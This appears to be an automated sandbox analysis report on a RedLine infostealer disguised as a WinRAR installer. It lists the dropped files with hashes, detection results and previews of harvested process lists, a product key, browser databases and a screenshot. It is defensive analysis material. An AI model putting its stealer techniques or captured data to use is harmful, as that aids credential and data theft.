                                                          Encrypted:false
                                                          SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                          MD5:E8ACCA0F46CBA97FE289855535184C72
                                                          SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                          SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                          SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                          Malicious:false
                                                          Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.700014595314478
                                                          Encrypted:false
                                                          SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                          MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                          SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                          SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                          SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                          Malicious:false
                                                          Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.6994061563025005
                                                          Encrypted:false
                                                          SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                          MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                          SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                          SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                          SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                          Malicious:false
                                                          Preview:ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):282
                                                          Entropy (8bit):3.5191090305155277
                                                          Encrypted:false
                                                          SSDEEP:6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlt4DAlLwkAl2FlRaQmZWGokJISlVl9:QZsiL5wmHOlDmo0qmt4clLwr2FlDmo0d
                                                          MD5:3A37312509712D4E12D27240137FF377
                                                          SHA1:30CED927E23B584725CF16351394175A6D2A9577
                                                          SHA-256:B029393EA7B7CF644FB1C9F984F57C1980077562EE2E15D0FFD049C4C48098D3
                                                          SHA-512:DBB9ABE70F8A781D141A71651A62A3A743C71A75A8305E9D23AF92F7307FB639DC4A85499115885E2A781B040CBB7613F582544C2D6DE521E588531E9C294B05
                                                          Malicious:false
                                                          Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.4.....
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):190
                                                          Entropy (8bit):3.5497401529130053
                                                          Encrypted:false
                                                          SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
                                                          MD5:D48FCE44E0F298E5DB52FD5894502727
                                                          SHA1:FCE1E65756138A3CA4EAAF8F7642867205B44897
                                                          SHA-256:231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
                                                          SHA-512:A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
                                                          Malicious:false
                                                          Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):190
                                                          Entropy (8bit):3.5497401529130053
                                                          Encrypted:false
                                                          SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
                                                          MD5:87A524A2F34307C674DBA10708585A5E
                                                          SHA1:E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
                                                          SHA-256:D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
                                                          SHA-512:7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
                                                          Malicious:false
                                                          Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):504
                                                          Entropy (8bit):3.514398793376306
                                                          Encrypted:false
                                                          SSDEEP:12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
                                                          MD5:29EAE335B77F438E05594D86A6CA22FF
                                                          SHA1:D62CCC830C249DE6B6532381B4C16A5F17F95D89
                                                          SHA-256:88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
                                                          SHA-512:5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
                                                          Malicious:false
                                                          Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):22565
                                                          Entropy (8bit):5.709681260644561
                                                          Encrypted:false
                                                          SSDEEP:384:MISJQOldiLrt/cRTcEQqTjxiV3oexQFiG6yX7yGTSthl5CUjv2zQAndWivCZeUwV:MISJQOldiLrt/cRTcEQqTjxiV3oexQFZ
                                                          MD5:9F184B7C93793275E68A12F9F91093A8
                                                          SHA1:A3046620BC5A38B3D3A2081DCD0774A25E5D5F70
                                                          SHA-256:09CEB1DCC9A35C47AFBAEA2471DE3AC96600AD385E4E769C6312A1D14520825C
                                                          SHA-512:BC0774251936849D45144A47FCE2B002159D7F4058CD768FC6B21869333AA5A8CA614DA0DDAD8A21045428E32CD7DD05549D6C21E9A7B14FBE632F696BE53F5B
                                                          Malicious:false
                                                          Preview:NAME: jRJjViJPGrVdYLDoRAjbCMJe..PID: 6464..EXE: C:\Program Files (x86)\XZKtKIWLqKLEXdbtoouyIvNuYxDJHSBjfoSPVtNhilHwWWnqrPgHmgqc\jRJjViJPGrVdYLDoRAjbCMJe.exe..NAME: svchost..PID: 2152..EXE: C:\Windows\system32\svchost.exe..NAME: jRJjViJPGrVdYLDoRAjbCMJe..PID: 6892..EXE: C:\Program Files (x86)\XZKtKIWLqKLEXdbtoouyIvNuYxDJHSBjfoSPVtNhilHwWWnqrPgHmgqc\jRJjViJPGrVdYLDoRAjbCMJe.exe..NAME: explorer..PID: 2580..EXE: C:\Windows\Explorer.EXE..NAME: jRJjViJPGrVdYLDoRAjbCMJe..PID: 6488..EXE: C:\Program Files (x86)\XZKtKIWLqKLEXdbtoouyIvNuYxDJHSBjfoSPVtNhilHwWWnqrPgHmgqc\jRJjViJPGrVdYLDoRAjbCMJe.exe..NAME: fontdrvhost..PID: 784..EXE: C:\Windows\system32\fontdrvhost.exe..NAME: jRJjViJPGrVdYLDoRAjbCMJe..PID: 4296..EXE: C:\Program Files (x86)\XZKtKIWLqKLEXdbtoouyIvNuYxDJHSBjfoSPVtNhilHwWWnqrPgHmgqc\jRJjViJPGrVdYLDoRAjbCMJe.exe..NAME: RuntimeBroker..PID: 416..EXE: C:\Windows\System32\RuntimeBroker.exe..NAME: _microsoft_corporation..PID: 7740..EXE: C:\Users\user\AppData\Local\Temp\_microsoft_corporatio
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):29
                                                          Entropy (8bit):3.702471512219747
                                                          Encrypted:false
                                                          SSDEEP:3:U1cP1vgle:U16j
                                                          MD5:0C645753939B9121AABB96D7529AE9E9
                                                          SHA1:7D4A2A667D442E94855217B8B64DA61155077A51
                                                          SHA-256:19ADC6ABB99F91E30FFFD550A4B7ECC2F262C4C2827969706C05DF21E3415C82
                                                          SHA-512:1E3CD6A51E50F2229E1613E9A7989726CF580E82EACC71200082AB73C479F6F7A97153AFCCBDF590800713414251EE08715C7B1C2947A9925F285AFF200D183D
                                                          Malicious:false
                                                          Preview:PJN2W-Q2Q24-RGYQ9-4PJGY-D84K4
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):84
                                                          Entropy (8bit):4.6630509827051725
                                                          Encrypted:false
                                                          SSDEEP:3:PHsEiVboFkaQXMtS1ME/M2en:PsEwYVQXOS1TUn
                                                          MD5:58CD2334CFC77DB470202487D5034610
                                                          SHA1:61FA242465F53C9E64B3752FE76B2ADCCEB1F237
                                                          SHA-256:59B3120C5CE1A7D1819510272A927E1C8F1C95385213FCCBCDD429FF3492040D
                                                          SHA-512:C8F52D85EC99177C722527C306A64BA61ADC3AD3A5FEC6D87749FBAD12DA424BA6B34880AB9DA627FB183412875F241E1C1864D723E62130281E44C14AD1481E
                                                          Malicious:false
                                                          Preview:Active code page: 65001..The Wireless AutoConfig Service (wlansvc) is not running...
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):19275
                                                          Entropy (8bit):5.659572283259363
                                                          Encrypted:false
                                                          SSDEEP:384:8Gji2hovYxwlW3wonXfb5Ysixiy8QoPOS/1pB5TXbihcMz34eH2O25ioJhQA4MUS:8Gji2hovYxwlW3wonXfb5Ysixiy8FPOg
                                                          MD5:DFA83BD1E7EAFCD69BBA201532007659
                                                          SHA1:930513381CD079AC860F8F14A7602187EE580867
                                                          SHA-256:D80AE4B6E920602EC99A31BA053911931ED414F8002ACC8647434B156D54A8AA
                                                          SHA-512:40A788B2C56F168CA6E485AA8A94EBA502F3134C2CFB1511AC8B031D767B6A0C3C140F72B30C087A026BFB236C2FB8D59167CA2C61669B96EEB136D85FB9B068
                                                          Malicious:false
                                                          Preview:NAME: jRJjViJPGrVdYLDoRAjbCMJe..TITLE: New Tab - Google Chrome..PID: 6464..EXE: C:\Program Files (x86)\XZKtKIWLqKLEXdbtoouyIvNuYxDJHSBjfoSPVtNhilHwWWnqrPgHmgqc\jRJjViJPGrVdYLDoRAjbCMJe.exe..NAME: jRJjViJPGrVdYLDoRAjbCMJe..TITLE: New Tab - Google Chrome..PID: 6892..EXE: C:\Program Files (x86)\XZKtKIWLqKLEXdbtoouyIvNuYxDJHSBjfoSPVtNhilHwWWnqrPgHmgqc\jRJjViJPGrVdYLDoRAjbCMJe.exe..NAME: jRJjViJPGrVdYLDoRAjbCMJe..TITLE: New Tab - Google Chrome..PID: 6488..EXE: C:\Program Files (x86)\XZKtKIWLqKLEXdbtoouyIvNuYxDJHSBjfoSPVtNhilHwWWnqrPgHmgqc\jRJjViJPGrVdYLDoRAjbCMJe.exe..NAME: jRJjViJPGrVdYLDoRAjbCMJe..TITLE: New Tab - Google Chrome..PID: 4296..EXE: C:\Program Files (x86)\XZKtKIWLqKLEXdbtoouyIvNuYxDJHSBjfoSPVtNhilHwWWnqrPgHmgqc\jRJjViJPGrVdYLDoRAjbCMJe.exe..NAME: jRJjViJPGrVdYLDoRAjbCMJe..TITLE: New Tab - Google Chrome..PID: 6276..EXE: C:\Program Files (x86)\XZKtKIWLqKLEXdbtoouyIvNuYxDJHSBjfoSPVtNhilHwWWnqrPgHmgqc\jRJjViJPGrVdYLDoRAjbCMJe.exe..NAME: jRJjViJPGrVdYLDoRAjbCMJe..TITLE: New Tab - G
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                          Category:dropped
                                                          Size (bytes):121487
                                                          Entropy (8bit):7.8891545992453125
                                                          Encrypted:false
                                                          SSDEEP:3072:w5DTKolpHtb19zyK9WbyXfx/CcLGS222226EPG+XnOyj:IXHpNbY2XfBCcLGS222226EPGQnOu
                                                          MD5:C6541F8AA129DD048E70E85EFC9B1296
                                                          SHA1:7AA29375D14C6DA50282F88329580E099AFD119B
                                                          SHA-256:7CC473B4E9050D7E4F6802CD79EEBECE7C80F9512C8AF948F830523268BD4292
                                                          SHA-512:2958EB047E348A49D99880E06F58A440822B18F1FF888B2B0BBBD93F53D7F9D1F2A903B7CA2A779D2CF55747F07C14ADD0E6E5E7CC28315599FF6A51F69136E4
                                                          Malicious:false
                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3.*..m..,.X.c.#....O.*.i.....w...._.#.*bi.F.xJ.5KC"...N...m.g....Uf.....?.2......Q.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..o.<-...OF.....j.#?........x..........#..........9.+..........e\.../n-.n.dh.c...k....1.q...y5..r..N.)W...O.d.QEw.!E.P11E-v.....Z..tN.Lo..?.Xb1....Oc....&...W.8.+.?.]._.....G.R....n..............z...........w..#.......`..
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):6
                                                          Entropy (8bit):2.2516291673878226
                                                          Encrypted:false
                                                          SSDEEP:3:ISEd:ISEd
                                                          MD5:008104B045E7247567EA4EEF3458A310
                                                          SHA1:6A2E521605C029AB4E0E961AA782CE68736D9E03
                                                          SHA-256:950C01DA8898949F1F69A008EFBFE2378DC75009407882C2B63E88130E0D4D1D
                                                          SHA-512:53ACC94334036F4ECCA676A1652A3FCDF46E0F7817109E142FA042818D0523275B62D638C22B58EB6A84AADF4872E27A3C2481D7503B3A26F40A88D753F71325
                                                          Malicious:false
                                                          Preview:147548
                                                          Process:C:\Users\user\Desktop\WinRAR 7.01 Pro.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):323
                                                          Entropy (8bit):5.363435887027673
                                                          Encrypted:false
                                                          SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTt92W+P12MUAvvrs:Q3La/KDLI4MWuPTAt92n4M6
                                                          MD5:073F05396DE9273ED9563E2E299BB296
                                                          SHA1:3EBA610FE88F782B4BCA99C3C39DC6AF65C574ED
                                                          SHA-256:C180FCC444FA7EAAC96D0EBC011ADA54DCFF3022C06087CB2526A182BA05C30B
                                                          SHA-512:354432510FD8C60EAC239DC8E9BE7A8C92CACB0FC09F3908721D41B8BBD8F480E88D650BC6AB306CAFE3D189660356200BB2F5E11143776222A75B2F9C5748BE
                                                          Malicious:true
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                          Process:C:\Users\user\Desktop\WinRAR 7.01 Pro.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):498688
                                                          Entropy (8bit):7.821177560358948
                                                          Encrypted:false
                                                          SSDEEP:12288:qh1Lk70Tnvjck6Ngg6sQaGzUgMyieRxUJOerd/NUBzHiW:Ok70TrcVgg6sQRzUUbReJOu0BzN
                                                          MD5:B2795FBED63C8C1B0846B3EAEAE2FE0F
                                                          SHA1:D1145CFF21E008C9AD581CCF1719139D754355DE
                                                          SHA-256:5EA467D548D41B747370A235C9A245910ED58D55482A48246196FAF391213C24
                                                          SHA-512:47FFCC3C74113DB4C389BA9A6B5DB7CE325D1F63E431405A9F6613918C387DE4A677F20804AAD6AA458BF2151DE418C2F72740F4F5083FB45BF6C4B0F564E564
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe, Author: ditekSHen
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 62%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~...................f....PE..L...t..P..........#................./.............@..................................;..........................................P....`...z..............................................................@............................................text............................... ..`.rdata...m.......n..................@..@.data....0... ......................@....rsrc....z...`...|... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):5242880
                                                          Entropy (8bit):0.037963276276857943
                                                          Encrypted:false
                                                          SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                          MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                          SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                          SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                          SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.1358696453229276
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
